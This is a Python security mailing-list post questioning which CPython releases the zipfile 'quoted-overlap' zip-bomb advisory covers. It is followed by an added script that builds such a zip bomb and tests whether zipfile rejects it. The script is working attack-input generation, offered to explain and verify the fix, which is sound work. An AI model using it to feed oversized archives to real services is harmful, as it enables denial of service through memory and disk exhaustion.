Hello, I am a bit confused about this.
On Tue, 2024-03-19 at 11:10 -0400, Ee Durbin wrote:
> An issue was found in the CPython `zipfile` module affecting versions
> 3.12.2, 3.11.8, 3.10.13, 3.9.18, and 3.8.18 and prior.

It seems that 3.11.8 and 3.12.2 already contained a patch for this:

$ git describe --contains a956e510f6336d5ae111ba429a61c3ade30a7549
v3.11.8~173
$ git describe --contains fa181fcf2156f703347b03a3b1966ce47be8ab3b
v3.12.2~196

> The zipfile module is vulnerable to “quoted-overlap” zip-bombs which
> exploit the zip format to create a zip-bomb with a high compression ratio.
> The fixed versions of CPython make the zipfile module reject zip archives
> which overlap entries in the archive.

-- 
Best regards,
Michał Górny
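For readers who want to see what "quoted-overlap" and "overlapping entries" mean concretely, the following is an added example written for this archive page; it is not code from the CPython project or from either poster. It builds a small archive in which every local file header after the first is "quoted" inside the previous entry's deflate stream as a non-final stored block, so all entries end in one shared compressed kernel and their advertised sizes add up to far more than the file holds. The entry names (f000.bin ...), the 1 MiB all-zero kernel and the 16-entry count are this example's choices. `inflate_raw` proves the layout is a valid deflate stream independently of `zipfile`; `read_with_zipfile` reports whether the installed interpreter reads the first entry or refuses it with `BadZipFile`, which is what the patched releases the thread discusses do, as far as I read the fix: an entry whose compressed data runs past the next entry's local header is rejected.

```python
"""Quoted-overlap zip construction and how CPython's zipfile treats it.

Added example for the thread above, not CPython code. Assumptions: entry
names f000.bin..., a 1 MiB all-zero kernel, raw deflate (method 8).
"""
import io
import struct
import zipfile
import zlib
from dataclasses import dataclass

LFH_SIG, CDH_SIG, EOCD_SIG = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
LFH_FIXED = 30   # fixed part of a local file header, before the name
STORED_HDR = 5   # deflate stored-block header: 1 byte + LEN + NLEN


@dataclass
class Entry:
    name: bytes
    crc: int
    csize: int
    usize: int
    offset: int  # offset of the local file header within the archive


def _lfh(name, crc, csize, usize):
    # version needed 2.0, no flags, method 8 (deflate), zero DOS time/date, no extra
    return LFH_SIG + struct.pack("<HHHHHIIIHH", 20, 0, 8, 0, 0,
                                 crc, csize, usize, len(name), 0) + name


def _cdh(e):
    return CDH_SIG + struct.pack("<HHHHHHIIIHHHHHII", 20, 20, 0, 8, 0, 0,
                                 e.crc, e.csize, e.usize, len(e.name),
                                 0, 0, 0, 0, 0, e.offset) + e.name


def _stored_block_header(length):
    # Non-final stored block (BFINAL=0, BTYPE=00): the next `length` bytes are
    # copied to the output verbatim, which lets a local file header sit inside
    # the previous entry's deflate stream without breaking it.
    return b"\x00" + struct.pack("<HH", length, length ^ 0xFFFF)


def build_quoted_overlap_zip(n_files, kernel_plain):
    """Return (archive_bytes, [Entry, ...]) for an n-entry quoted-overlap zip."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    kernel = comp.compress(kernel_plain) + comp.flush()
    names = [f"f{i:03d}.bin".encode() for i in range(n_files)]

    # Work backwards: entry i's stream is stored(LFH[i+1]) + entry i+1's stream,
    # so its size and CRC depend on the headers that come after it.
    lfhs = [b""] * n_files
    meta = [None] * n_files
    quoted = b""          # header bytes entry i inflates to before the kernel
    csize = len(kernel)
    for i in reversed(range(n_files)):
        usize = len(quoted) + len(kernel_plain)
        crc = zlib.crc32(kernel_plain, zlib.crc32(quoted))
        lfhs[i] = _lfh(names[i], crc, csize, usize)
        meta[i] = (names[i], crc, csize, usize)
        quoted = lfhs[i] + quoted
        csize += STORED_HDR + len(lfhs[i])

    body = bytearray()
    entries = []
    for i in range(n_files):
        entries.append(Entry(*meta[i], offset=len(body)))
        body += lfhs[i]
        if i + 1 < n_files:
            body += _stored_block_header(len(lfhs[i + 1]))  # payload is next LFH
    body += kernel                                          # shared by every entry

    cd = b"".join(_cdh(e) for e in entries)
    eocd = EOCD_SIG + struct.pack("<HHHHIIH", 0, 0, n_files, n_files,
                                  len(cd), len(body), 0)
    return bytes(body) + cd + eocd, entries


def inflate_raw(archive, e):
    """Inflate one entry straight from its byte range, bypassing zipfile, and
    check it against the header's size and CRC. Returns the plaintext."""
    start = e.offset + LFH_FIXED + len(e.name)
    out = zlib.decompress(archive[start:start + e.csize], -15)
    if len(out) != e.usize or zlib.crc32(out) != e.crc:
        raise ValueError(f"{e.name!r}: inflated data does not match header")
    return out


def read_with_zipfile(archive, name):
    """('read', n_bytes) if zipfile hands the entry back,
    ('rejected', message) if it raises BadZipFile."""
    try:
        with zipfile.ZipFile(io.BytesIO(archive)) as zf, zf.open(name) as f:
            n = 0
            while chunk := f.read(1 << 16):
                n += len(chunk)
            return "read", n
    except zipfile.BadZipFile as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    archive, entries = build_quoted_overlap_zip(16, b"\x00" * (1 << 20))
    nominal = sum(e.usize for e in entries)
    print(f"{len(archive)} bytes on disk, {nominal} bytes advertised "
          f"({nominal / len(archive):.0f}:1)")
    print("entry 0 via zipfile:   ", read_with_zipfile(archive, "f000.bin"))
    print("last entry via zipfile:", read_with_zipfile(archive, "f015.bin"))
```

Run it under 3.12.2 or 3.11.8 and the first entry comes back as `('rejected', ...)`; on an interpreter without the fix it reads a little over 1 MiB, and every earlier entry would do the same from the same few hundred bytes of kernel. The last entry has nothing quoted after it and reads cleanly on either, which is the overlap check working as intended rather than a blanket refusal of the archive.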
_______________________________________________
Security-SIG mailing list -- security-sig@python.org
https://mail.python.org/mailman3/lists/security-sig.python.org/